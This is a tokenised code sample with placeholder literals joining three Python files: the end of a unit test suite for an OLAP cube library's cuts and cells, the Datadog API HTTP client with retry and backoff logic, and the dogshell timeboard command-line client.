"<STR_LIT>" , str ( cut ) ) <EOL> cut = cut_from_string ( "<STR_LIT>" ) <EOL> if cut . to_path : <EOL> self . fail ( '<STR_LIT>' % ( cut . to_path , ) ) <EOL> cut = RangeCut ( "<STR_LIT:date>" , None , [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> cut = cut_from_string ( "<STR_LIT>" ) <EOL> if cut . from_path : <EOL> self . fail ( '<STR_LIT>' % ( cut . from_path , ) ) <EOL> cut = RangeCut ( "<STR_LIT:date>" , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT:2>" , "<STR_LIT:3>" ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( "<STR_LIT>" ) ) <EOL> cut = RangeCut ( "<STR_LIT:foo>" , [ "<STR_LIT>" ] , [ "<STR_LIT:1>" ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( "<STR_LIT>" ) ) <EOL> cut = RangeCut ( "<STR_LIT:foo>" , [ "<STR_LIT>" ] , [ "<STR_LIT:1>" ] ) <EOL> self . assertEqual ( r"<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( r"<STR_LIT>" ) ) <EOL> def test_hierarchy_cut ( self ) : <EOL> cut = PointCut ( "<STR_LIT:date>" , [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( "<STR_LIT>" ) ) <EOL> class CellInteractiveSlicingTestCase ( CubesTestCaseBase ) : <EOL> def setUp ( self ) : <EOL> super ( CellInteractiveSlicingTestCase , self ) . setUp ( ) <EOL> self . provider = create_provider ( "<STR_LIT>" ) <EOL> self . cube = self . provider . cube ( "<STR_LIT>" ) <EOL> def test_cutting ( self ) : <EOL> full_cube = Cell ( self . cube ) <EOL> self . assertEqual ( self . cube , full_cube . cube ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( full_cube . cuts ) ) <EOL> cell = full_cube . slice ( PointCut ( "<STR_LIT:date>" , [ <NUM_LIT> ] ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( cell . cuts ) ) <EOL> cell = cell . slice ( PointCut ( "<STR_LIT>" , [ <NUM_LIT> ] ) ) <EOL> cell = cell . slice ( PointCut ( "<STR_LIT>" , [ <NUM_LIT:50> , <NUM_LIT:20> ] ) ) <EOL> self . assertEqual ( <NUM_LIT:3> , len ( cell . cuts ) ) <EOL> self . assertEqual ( self . cube , cell . cube ) <EOL> cell = cell . slice ( PointCut ( "<STR_LIT:date>" , [ <NUM_LIT> ] ) ) <EOL> self . assertEqual ( <NUM_LIT:3> , len ( cell . cuts ) ) <EOL> def test_multi_slice ( self ) : <EOL> full_cube = Cell ( self . cube ) <EOL> cuts_list = ( <EOL> PointCut ( "<STR_LIT:date>" , [ <NUM_LIT> ] ) , <EOL> PointCut ( "<STR_LIT>" , [ <NUM_LIT:50> , <NUM_LIT:20> ] ) , <EOL> PointCut ( "<STR_LIT>" , [ <NUM_LIT> ] ) ) <EOL> cell_list = full_cube . multi_slice ( cuts_list ) <EOL> self . assertEqual ( <NUM_LIT:3> , len ( cell_list . cuts ) ) <EOL> self . assertRaises ( CubesError , full_cube . multi_slice , { } ) <EOL> def test_get_cell_dimension_cut ( self ) : <EOL> full_cube = Cell ( self . cube ) <EOL> cell = full_cube . slice ( PointCut ( "<STR_LIT:date>" , [ <NUM_LIT> ] ) ) <EOL> cell = cell . slice ( PointCut ( "<STR_LIT>" , [ <NUM_LIT> ] ) ) <EOL> cut = cell . cut_for_dimension ( "<STR_LIT:date>" ) <EOL> self . assertEqual ( str ( cut . dimension ) , "<STR_LIT:date>" ) <EOL> self . assertRaises ( NoSuchDimensionError , cell . cut_for_dimension , "<STR_LIT>" ) <EOL> cut = cell . cut_for_dimension ( "<STR_LIT>" ) <EOL> self . assertEqual ( cut , None ) <EOL> def test_hierarchy_path ( self ) : <EOL> dim = self . cube . dimension ( "<STR_LIT>" ) <EOL> hier = dim . hierarchy ( ) <EOL> levels = hier . levels_for_path ( [ ] ) <EOL> self . assertEqual ( len ( levels ) , <NUM_LIT:0> ) <EOL> levels = hier . levels_for_path ( None ) <EOL> self . assertEqual ( len ( levels ) , <NUM_LIT:0> ) <EOL> levels = hier . levels_for_path ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] ) <EOL> self . assertEqual ( len ( levels ) , <NUM_LIT:4> ) <EOL> names = [ level . name for level in levels ] <EOL> self . assertEqual ( names , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:class>' , '<STR_LIT>' ] ) <EOL> self . assertRaises ( HierarchyError , hier . levels_for_path , <EOL> [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> ] ) <EOL> def test_hierarchy_drilldown_levels ( self ) : <EOL> dim = self . cube . dimension ( "<STR_LIT>" ) <EOL> hier = dim . hierarchy ( ) <EOL> levels = hier . levels_for_path ( [ ] , drilldown = True ) <EOL> self . assertEqual ( len ( levels ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( levels [ <NUM_LIT:0> ] . name , '<STR_LIT>' ) <EOL> levels = hier . levels_for_path ( None , drilldown = True ) <EOL> self . assertEqual ( len ( levels ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( levels [ <NUM_LIT:0> ] . name , '<STR_LIT>' ) <EOL> def test_slice_drilldown ( self ) : <EOL> cut = PointCut ( "<STR_LIT:date>" , [ ] ) <EOL> original_cell = Cell ( self . cube , [ cut ] ) <EOL> cell = original_cell . drilldown ( "<STR_LIT:date>" , <NUM_LIT> ) <EOL> self . assertEqual ( [ <NUM_LIT> ] , cell . cut_for_dimension ( "<STR_LIT:date>" ) . path ) <EOL> cell = cell . drilldown ( "<STR_LIT:date>" , <NUM_LIT:1> ) <EOL> self . assertEqual ( [ <NUM_LIT> , <NUM_LIT:1> ] , cell . cut_for_dimension ( "<STR_LIT:date>" ) . path ) <EOL> cell = cell . drilldown ( "<STR_LIT:date>" , <NUM_LIT:2> ) <EOL> self . assertEqual ( [ <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:2> ] , cell . cut_for_dimension ( "<STR_LIT:date>" ) . path ) <EOL> def test_suite ( ) : <EOL> suite = unittest . TestSuite ( ) <EOL> suite . addTest ( unittest . makeSuite ( AggregationBrowserTestCase ) ) <EOL> suite . addTest ( unittest . makeSuite ( CellsAndCutsTestCase ) ) <EOL> return suite </s>
<s> import time <EOL> import logging <EOL> import requests <EOL> import simplejson as json <EOL> from datadog . api . exceptions import ClientError , ApiError , HttpBackoff , HttpTimeout , ApiNotInitialized <EOL> from datadog . api import _api_version , _max_timeouts , _backoff_period <EOL> from datadog . util . compat import is_p3k <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> class HTTPClient ( object ) : <EOL> """<STR_LIT>""" <EOL> _backoff_period = _backoff_period <EOL> _max_timeouts = _max_timeouts <EOL> _backoff_timestamp = None <EOL> _timeout_counter = <NUM_LIT:0> <EOL> _api_version = _api_version <EOL> @ classmethod <EOL> def request ( cls , method , path , body = None , attach_host_name = False , response_formatter = None , <EOL> error_formatter = None , ** params ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if not cls . _should_submit ( ) : <EOL> raise HttpBackoff ( "<STR_LIT>" <EOL> . format ( * cls . _backoff_status ( ) ) ) <EOL> from datadog . api import _api_key , _application_key , _api_host , _mute , _host_name , _proxies , _max_retries , _timeout , _cacert <EOL> if _api_key is None : <EOL> raise ApiNotInitialized ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> params [ '<STR_LIT>' ] = _api_key <EOL> if _application_key : <EOL> params [ '<STR_LIT>' ] = _application_key <EOL> url = "<STR_LIT>" % ( _api_host , cls . _api_version , path . lstrip ( "<STR_LIT:/>" ) ) <EOL> if attach_host_name and body : <EOL> if '<STR_LIT>' in body : <EOL> for obj_params in body [ '<STR_LIT>' ] : <EOL> if obj_params . get ( '<STR_LIT:host>' , "<STR_LIT>" ) == "<STR_LIT>" : <EOL> obj_params [ '<STR_LIT:host>' ] = _host_name <EOL> else : <EOL> if body . get ( '<STR_LIT:host>' , "<STR_LIT>" ) == "<STR_LIT>" : <EOL> body [ '<STR_LIT:host>' ] = _host_name <EOL> if '<STR_LIT>' in params and isinstance ( params [ '<STR_LIT>' ] , list ) : <EOL> params [ '<STR_LIT>' ] = '<STR_LIT:U+002C>' . join ( params [ '<STR_LIT>' ] ) <EOL> headers = { } <EOL> if isinstance ( body , dict ) : <EOL> body = json . dumps ( body ) <EOL> headers [ '<STR_LIT:Content-Type>' ] = '<STR_LIT:application/json>' <EOL> start_time = time . time ( ) <EOL> try : <EOL> s = requests . Session ( ) <EOL> http_adapter = requests . adapters . HTTPAdapter ( max_retries = _max_retries ) <EOL> s . mount ( '<STR_LIT>' , http_adapter ) <EOL> result = s . request ( <EOL> method , <EOL> url , <EOL> headers = headers , <EOL> params = params , <EOL> data = body , <EOL> timeout = _timeout , <EOL> proxies = _proxies , <EOL> verify = _cacert ) <EOL> result . raise_for_status ( ) <EOL> except requests . ConnectionError as e : <EOL> raise ClientError ( "<STR_LIT>" % ( method , _api_host , url , e ) ) <EOL> except requests . exceptions . Timeout as e : <EOL> cls . _timeout_counter += <NUM_LIT:1> <EOL> raise HttpTimeout ( '<STR_LIT>' % ( method , url , _timeout ) ) <EOL> except requests . exceptions . HTTPError as e : <EOL> if e . response . status_code in ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) : <EOL> pass <EOL> else : <EOL> raise <EOL> except TypeError as e : <EOL> raise TypeError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> duration = round ( ( time . time ( ) - start_time ) * <NUM_LIT> , <NUM_LIT:4> ) <EOL> log . info ( "<STR_LIT>" % ( result . status_code , method , url , duration ) ) <EOL> cls . _timeout_counter = <NUM_LIT:0> <EOL> content = result . content <EOL> if content : <EOL> try : <EOL> if is_p3k ( ) : <EOL> response_obj = json . loads ( content . decode ( '<STR_LIT:utf-8>' ) ) <EOL> else : <EOL> response_obj = json . loads ( content ) <EOL> except ValueError : <EOL> raise ValueError ( '<STR_LIT>' . format ( content ) ) <EOL> if response_obj and '<STR_LIT>' in response_obj : <EOL> raise ApiError ( response_obj ) <EOL> else : <EOL> response_obj = None <EOL> if response_formatter is None : <EOL> return response_obj <EOL> else : <EOL> return response_formatter ( response_obj ) <EOL> except ClientError as e : <EOL> if _mute : <EOL> log . error ( str ( e ) ) <EOL> if error_formatter is None : <EOL> return { '<STR_LIT>' : e . args [ <NUM_LIT:0> ] } <EOL> else : <EOL> return error_formatter ( { '<STR_LIT>' : e . args [ <NUM_LIT:0> ] } ) <EOL> else : <EOL> raise <EOL> except ApiError as e : <EOL> if _mute : <EOL> for error in e . args [ <NUM_LIT:0> ] [ '<STR_LIT>' ] : <EOL> log . error ( str ( error ) ) <EOL> if error_formatter is None : <EOL> return e . args [ <NUM_LIT:0> ] <EOL> else : <EOL> return error_formatter ( e . args [ <NUM_LIT:0> ] ) <EOL> else : <EOL> raise <EOL> @ classmethod <EOL> def _should_submit ( cls ) : <EOL> """<STR_LIT>""" <EOL> now = time . time ( ) <EOL> should_submit = False <EOL> if not cls . _backoff_timestamp and cls . _timeout_counter >= cls . _max_timeouts : <EOL> log . info ( "<STR_LIT>" <EOL> . format ( cls . _backoff_period ) ) <EOL> cls . _backoff_timestamp = now <EOL> should_submit = False <EOL> elif cls . _backoff_timestamp : <EOL> backed_off_time , backoff_time_left = cls . _backoff_status ( ) <EOL> if backoff_time_left < <NUM_LIT:0> : <EOL> log . info ( "<STR_LIT>" <EOL> . format ( backed_off_time ) ) <EOL> cls . _backoff_timestamp = None <EOL> cls . _timeout_counter = <NUM_LIT:0> <EOL> should_submit = True <EOL> else : <EOL> log . info ( "<STR_LIT>" <EOL> . format ( backoff_time_left ) ) <EOL> should_submit = False <EOL> else : <EOL> should_submit = True <EOL> return should_submit <EOL> @ classmethod <EOL> def _backoff_status ( cls ) : <EOL> now = time . time ( ) <EOL> backed_off_time = now - cls . _backoff_timestamp <EOL> backoff_time_left = cls . _backoff_period - backed_off_time <EOL> return round ( backed_off_time , <NUM_LIT:2> ) , round ( backoff_time_left , <NUM_LIT:2> ) <EOL> class CreateableAPIResource ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def create ( cls , attach_host_name = False , method = '<STR_LIT:POST>' , id = None , params = None , ** body ) : <EOL> """<STR_LIT>""" <EOL> if params is None : <EOL> params = { } <EOL> if method == '<STR_LIT:GET>' : <EOL> return HTTPClient . request ( '<STR_LIT:GET>' , cls . _class_url , ** body ) <EOL> if id is None : <EOL> return HTTPClient . request ( '<STR_LIT:POST>' , cls . _class_url , body , <EOL> attach_host_name = attach_host_name , ** params ) <EOL> else : <EOL> return HTTPClient . request ( '<STR_LIT:POST>' , cls . _class_url + "<STR_LIT:/>" + str ( id ) , body , <EOL> attach_host_name = attach_host_name , ** params ) <EOL> class SendableAPIResource ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def send ( cls , attach_host_name = False , id = None , ** body ) : <EOL> """<STR_LIT>""" <EOL> if id is None : <EOL> return HTTPClient . request ( '<STR_LIT:POST>' , cls . _class_url , body , <EOL> attach_host_name = attach_host_name ) <EOL> else : <EOL> return HTTPClient . request ( '<STR_LIT:POST>' , cls . _class_url + "<STR_LIT:/>" + str ( id ) , body , <EOL> attach_host_name = attach_host_name ) <EOL> class UpdatableAPIResource ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def update ( cls , id , params = None , ** body ) : <EOL> """<STR_LIT>""" <EOL> if params is None : <EOL> params = { } <EOL> return HTTPClient . request ( '<STR_LIT>' , cls . _class_url + "<STR_LIT:/>" + str ( id ) , body , ** params ) <EOL> class DeletableAPIResource ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def delete ( cls , id , ** params ) : <EOL> """<STR_LIT>""" <EOL> return HTTPClient . request ( '<STR_LIT>' , cls . _class_url + "<STR_LIT:/>" + str ( id ) , ** params ) <EOL> class GetableAPIResource ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def get ( cls , id , ** params ) : <EOL> """<STR_LIT>""" <EOL> return HTTPClient . request ( '<STR_LIT:GET>' , cls . _class_url + "<STR_LIT:/>" + str ( id ) , ** params ) <EOL> class ListableAPIResource ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def get_all ( cls , ** params ) : <EOL> """<STR_LIT>""" <EOL> return HTTPClient . request ( '<STR_LIT:GET>' , cls . _class_url , ** params ) <EOL> class SearchableAPIResource ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def _search ( cls , ** params ) : <EOL> """<STR_LIT>""" <EOL> return HTTPClient . request ( '<STR_LIT:GET>' , cls . _class_url , ** params ) <EOL> class ActionAPIResource ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def _trigger_class_action ( cls , method , name , id = None , ** params ) : <EOL> """<STR_LIT>""" <EOL> if id is None : <EOL> return HTTPClient . request ( method , cls . _class_url + "<STR_LIT:/>" + name , params ) <EOL> else : <EOL> return HTTPClient . request ( method , cls . _class_url + "<STR_LIT:/>" + str ( id ) + "<STR_LIT:/>" + name , params ) <EOL> @ classmethod <EOL> def _trigger_action ( cls , method , name , id = None , ** params ) : <EOL> """<STR_LIT>""" <EOL> if id is None : <EOL> return HTTPClient . request ( method , name , params ) <EOL> else : <EOL> return HTTPClient . request ( method , name + "<STR_LIT:/>" + str ( id ) , params ) </s>
<s> import os . path <EOL> import platform <EOL> import sys <EOL> import webbrowser <EOL> import argparse <EOL> import simplejson as json <EOL> from datadog import api <EOL> from datadog . util . format import pretty_json <EOL> from datadog . dogshell . common import report_errors , report_warnings , print_err <EOL> from datetime import datetime <EOL> class TimeboardClient ( object ) : <EOL> @ classmethod <EOL> def setup_parser ( cls , subparsers ) : <EOL> parser = subparsers . add_parser ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) <EOL> verb_parsers = parser . add_subparsers ( title = '<STR_LIT>' , dest = '<STR_LIT>' ) <EOL> verb_parsers . required = True <EOL> post_parser = verb_parsers . add_parser ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> post_parser . add_argument ( '<STR_LIT:title>' , help = "<STR_LIT>" ) <EOL> post_parser . add_argument ( '<STR_LIT:description>' , help = "<STR_LIT>" ) <EOL> post_parser . add_argument ( '<STR_LIT>' , help = "<STR_LIT>" <EOL> "<STR_LIT>" , nargs = "<STR_LIT:?>" ) <EOL> post_parser . add_argument ( '<STR_LIT>' , type = _template_variables , default = [ ] , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> post_parser . set_defaults ( func = cls . _post ) <EOL> update_parser = verb_parsers . add_parser ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> update_parser . add_argument ( '<STR_LIT>' , help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> update_parser . add_argument ( '<STR_LIT:title>' , help = "<STR_LIT>" ) <EOL> update_parser . add_argument ( '<STR_LIT:description>' , help = "<STR_LIT>" ) <EOL> update_parser . add_argument ( '<STR_LIT>' , help = "<STR_LIT>" <EOL> "<STR_LIT>" , nargs = "<STR_LIT:?>" ) <EOL> update_parser . add_argument ( '<STR_LIT>' , type = _template_variables , default = [ ] , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> update_parser . set_defaults ( func = cls . _update ) <EOL> show_parser = verb_parsers . add_parser ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> show_parser . add_argument ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> show_parser . set_defaults ( func = cls . _show ) <EOL> show_all_parser = verb_parsers . add_parser ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> show_all_parser . set_defaults ( func = cls . _show_all ) <EOL> pull_parser = verb_parsers . add_parser ( '<STR_LIT>' , help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> pull_parser . add_argument ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> pull_parser . add_argument ( '<STR_LIT:filename>' , help = "<STR_LIT>" ) <EOL> pull_parser . set_defaults ( func = cls . _pull ) <EOL> pull_all_parser = verb_parsers . add_parser ( '<STR_LIT>' , help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> pull_all_parser . add_argument ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> pull_all_parser . set_defaults ( func = cls . _pull_all ) <EOL> push_parser = verb_parsers . add_parser ( '<STR_LIT>' , help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> push_parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> push_parser . add_argument ( '<STR_LIT:file>' , help = "<STR_LIT>" , <EOL> nargs = '<STR_LIT:+>' , type = argparse . FileType ( '<STR_LIT:r>' ) ) <EOL> push_parser . set_defaults ( func = cls . _push ) <EOL> new_file_parser = verb_parsers . add_parser ( '<STR_LIT>' , help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> new_file_parser . add_argument ( '<STR_LIT:filename>' , help = "<STR_LIT>" ) <EOL> new_file_parser . add_argument ( '<STR_LIT>' , help = "<STR_LIT>" <EOL> "<STR_LIT>" , nargs = "<STR_LIT:?>" ) <EOL> new_file_parser . set_defaults ( func = cls . _new_file ) <EOL> web_view_parser = verb_parsers . add_parser ( '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) <EOL> web_view_parser . add_argument ( '<STR_LIT:file>' , help = "<STR_LIT>" , type = argparse . FileType ( '<STR_LIT:r>' ) ) <EOL> web_view_parser . set_defaults ( func = cls . _web_view ) <EOL> delete_parser = verb_parsers . add_parser ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> delete_parser . add_argument ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> delete_parser . set_defaults ( func = cls . _delete ) <EOL> @ classmethod <EOL> def _pull ( cls , args ) : <EOL> cls . _write_dash_to_file ( <EOL> args . timeboard_id , args . filename , <EOL> args . timeout , args . format , args . string_ids ) <EOL> @ classmethod <EOL> def _pull_all ( cls , args ) : <EOL> api . _timeout = args . timeout <EOL> def _title_to_filename ( title ) : <EOL> no_punct = '<STR_LIT>' . join ( [ c for c in title . lower ( ) if c . isalnum ( ) or c in [ "<STR_LIT:U+0020>" , "<STR_LIT:_>" , "<STR_LIT:->" ] ] ) <EOL> return no_punct . replace ( "<STR_LIT:U+0020>" , "<STR_LIT:_>" ) . replace ( "<STR_LIT:->" , "<STR_LIT:_>" ) . strip ( "<STR_LIT:_>" ) <EOL> format = args . format <EOL> res = api . Timeboard . get_all ( ) <EOL> report_warnings ( res ) <EOL> report_errors ( res ) <EOL> if not os . path . exists ( args . pull_dir ) : <EOL> os . mkdir ( args . pull_dir , <NUM_LIT> ) <EOL> used_filenames = set ( ) <EOL> for dash_summary in res [ '<STR_LIT>' ] : <EOL> filename = _title_to_filename ( dash_summary [ '<STR_LIT:title>' ] ) <EOL> if filename in used_filenames : <EOL> filename = filename + "<STR_LIT:->" + dash_summary [ '<STR_LIT:id>' ] <EOL> used_filenames . add ( filename ) <EOL> cls . _write_dash_to_file ( <EOL> dash_summary [ '<STR_LIT:id>' ] , os . path . join ( args . pull_dir , filename + "<STR_LIT>" ) , <EOL> args . timeout , format , args . string_ids ) <EOL> if format == '<STR_LIT>' : <EOL> print ( ( "<STR_LIT>" <EOL> . format ( len ( used_filenames ) , os . path . realpath ( args . pull_dir ) ) ) ) <EOL> @ classmethod <EOL> def _new_file ( cls , args ) : <EOL> api . _timeout = args . timeout <EOL> format = args . format <EOL> graphs = args . graphs <EOL> if args . graphs is None : <EOL> graphs = sys . stdin . read ( ) <EOL> try : <EOL> graphs = json . loads ( graphs ) <EOL> except : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> res = api . Timeboard . create ( <EOL> title = args . filename , <EOL> description = "<STR_LIT>" . format ( args . filename ) , <EOL> graphs = [ graphs ] ) <EOL> report_warnings ( res ) <EOL> report_errors ( res ) <EOL> cls . _write_dash_to_file ( res [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , args . filename , <EOL> args . timeout , format , args . string_ids ) <EOL> if format == '<STR_LIT>' : <EOL> print ( pretty_json ( res ) ) <EOL> else : <EOL> print ( json . dumps ( res ) ) <EOL> @ classmethod <EOL> def _write_dash_to_file ( cls , dash_id , filename , timeout , format = '<STR_LIT>' , string_ids = False ) : <EOL> with open ( filename , "<STR_LIT:w>" ) as f : <EOL> res = api . Timeboard . get ( dash_id ) <EOL> report_warnings ( res ) <EOL> report_errors ( res ) <EOL> dash_obj = res [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in dash_obj : <EOL> del dash_obj [ "<STR_LIT>" ] <EOL> if "<STR_LIT:url>" in dash_obj : <EOL> del dash_obj [ "<STR_LIT:url>" ] <EOL> if string_ids : <EOL> dash_obj [ "<STR_LIT:id>" ] = str ( dash_obj [ "<STR_LIT:id>" ] ) <EOL> json . dump ( dash_obj , f , indent = <NUM_LIT:2> ) <EOL> if format == '<STR_LIT>' : <EOL> print ( "<STR_LIT>" . format ( dash_id , filename ) ) <EOL> else : <EOL> print ( "<STR_LIT>" . format ( dash_id , filename ) ) <EOL> @ classmethod <EOL> def _push ( cls , args ) : <EOL> api . _timeout = args . timeout <EOL> for f in args . file : <EOL> try : <EOL> dash_obj = json . load ( f ) <EOL> except Exception as err : <EOL> raise Exception ( "<STR_LIT>" . format ( f . name , err ) ) <EOL> if args . append_auto_text : <EOL> datetime_str = datetime . now ( ) . strftime ( '<STR_LIT>' ) <EOL> auto_text = ( "<STR_LIT>" <EOL> . format ( datetime_str , f . name , dash_obj [ "<STR_LIT:id>" ] , platform . node ( ) ) ) <EOL> dash_obj [ "<STR_LIT:description>" ] += auto_text <EOL> tpl_vars = dash_obj . get ( "<STR_LIT>" , [ ] ) <EOL> if '<STR_LIT:id>' in dash_obj : <EOL> dash_obj [ "<STR_LIT:id>" ] = int ( dash_obj [ "<STR_LIT:id>" ] ) <EOL> res = api . Timeboard . update ( dash_obj [ "<STR_LIT:id>" ] , title = dash_obj [ "<STR_LIT:title>" ] , <EOL> description = dash_obj [ "<STR_LIT:description>" ] , <EOL> graphs = dash_obj [ "<STR_LIT>" ] , template_variables = tpl_vars ) <EOL> else : <EOL> res = api . Timeboard . create ( title = dash_obj [ "<STR_LIT:title>" ] , <EOL> description = dash_obj [ "<STR_LIT:description>" ] , <EOL> graphs = dash_obj [ "<STR_LIT>" ] , template_variables = tpl_vars ) <EOL> if '<STR_LIT>' in res : <EOL> print_err ( '<STR_LIT>' <EOL> . format ( dash_obj [ "<STR_LIT:id>" ] , f . name ) ) <EOL> report_warnings ( res ) <EOL> report_errors ( res ) <EOL> if format == '<STR_LIT>' : <EOL> print ( pretty_json ( res ) ) <EOL> else : <EOL> print ( json . dumps ( res ) ) <EOL> if args . format == '<STR_LIT>' : <EOL> print ( "<STR_LIT>" . format ( f . name , dash_obj [ "<STR_LIT:id>" ] ) ) <EOL> @ classmethod <EOL> def _post ( cls , args ) : <EOL> api . _timeout = args . timeout <EOL> format = args . format <EOL> graphs = args . graphs <EOL> if args . graphs is None : <EOL> graphs = sys . stdin . read ( ) <EOL> try : <EOL> graphs = json . loads ( graphs ) <EOL> except : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> res = api . Timeboard . create ( title = args . title , description = args . description , graphs = [ graphs ] , <EOL> template_variables = args . template_variables ) <EOL> report_warnings ( res ) <EOL> report_errors ( res ) <EOL> if format == '<STR_LIT>' : <EOL> print ( pretty_json ( res ) ) <EOL> else : <EOL> print ( json . dumps ( res ) ) <EOL> @ classmethod <EOL> def _update ( cls , args ) : <EOL> api . _timeout = args . timeout <EOL> format = args . format <EOL> graphs = args . graphs <EOL> if args . graphs is None : <EOL> graphs = sys . stdin . read ( ) <EOL> try : <EOL> graphs = json . loads ( graphs ) <EOL> except : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> res = api . Timeboard . update ( args . timeboard_id , title = args . title , <EOL> description = args . description , graphs = graphs , <EOL> template_variables = args . template_variables ) <EOL> report_warnings ( res ) <EOL> report_errors ( res ) <EOL> if format == '<STR_LIT>' : <EOL> print ( pretty_json ( res ) ) <EOL> else : <EOL> print ( json . dumps ( res ) ) <EOL> @ classmethod <EOL> def _show ( cls , args ) : <EOL> api . _timeout = args . timeout <EOL> format = args . format <EOL> res = api . Timeboard . get ( args . timeboard_id ) <EOL> report_warnings ( res ) <EOL> report_errors ( res ) <EOL> if args . string_ids : <EOL> res [ "<STR_LIT>" ] [ "<STR_LIT:id>" ] = str ( res [ "<STR_LIT>" ] [ "<STR_LIT:id>" ] ) <EOL> if format == '<STR_LIT>' : <EOL> print ( pretty_json ( res ) ) <EOL> else : <EOL> print ( json . dumps ( res ) ) <EOL> @ classmethod <EOL> def _show_all ( cls , args ) : <EOL> api . _timeout = args . timeout <EOL> format = args . format <EOL> res = api . Timeboard . get_all ( ) <EOL> report_warnings ( res ) <EOL> report_errors ( res ) <EOL> if args . string_ids : <EOL> for d in res [ "<STR_LIT>" ] : <EOL> d [ "<STR_LIT:id>" ] = str ( d [ "<STR_LIT:id>" ] ) <EOL> if format == '<STR_LIT>' : <EOL> print ( pretty_json ( res ) ) <EOL> elif format == '<STR_LIT>' : <EOL> print ( json . dumps ( res ) ) <EOL> else : <EOL> for d in res [ "<STR_LIT>" ] : <EOL> print ( "<STR_LIT:\t>" . join ( [ ( d [ "<STR_LIT:id>" ] ) , <EOL> ( d [ "<STR_LIT>" ] ) , <EOL> ( d [ "<STR_LIT:title>" ] ) , <EOL> cls . _escape ( d [ "<STR_LIT:description>" ] ) ] ) ) <EOL> @ classmethod <EOL> def _delete ( cls , args ) : <EOL> api . _timeout = args . timeout <EOL> res = api . Timeboard . delete ( args . timeboard_id ) <EOL> if res is not None : <EOL> report_warnings ( res ) <EOL> report_errors ( res ) <EOL> @ classmethod <EOL> def _web_view ( cls , args ) : <EOL> dash_id = json . load ( args . file ) [ '<STR_LIT:id>' ] <EOL> url = api . _api_host + "<STR_LIT>" . format ( dash_id ) <EOL> webbrowser . open ( url ) <EOL> @ classmethod <EOL> def _escape ( cls , s ) : <EOL> return s . replace ( "<STR_LIT:\r>" , "<STR_LIT>" ) . replace ( "<STR_LIT:\n>" , "<STR_LIT>" ) . replace ( "<STR_LIT:\t>" , "<STR_LIT>" ) <EOL> def _template_variables ( tpl_var_input ) : <EOL> if '<STR_LIT:[>' not in tpl_var_input : <EOL> return [ v . strip ( ) for v in tpl_var_input . split ( '<STR_LIT:U+002C>' ) ] <EOL> else : <EOL> try : <EOL> return json . loads ( tpl_var_input ) <EOL> except Exception : <EOL> raise argparse . ArgumentTypeError ( '<STR_LIT>' ) </s>
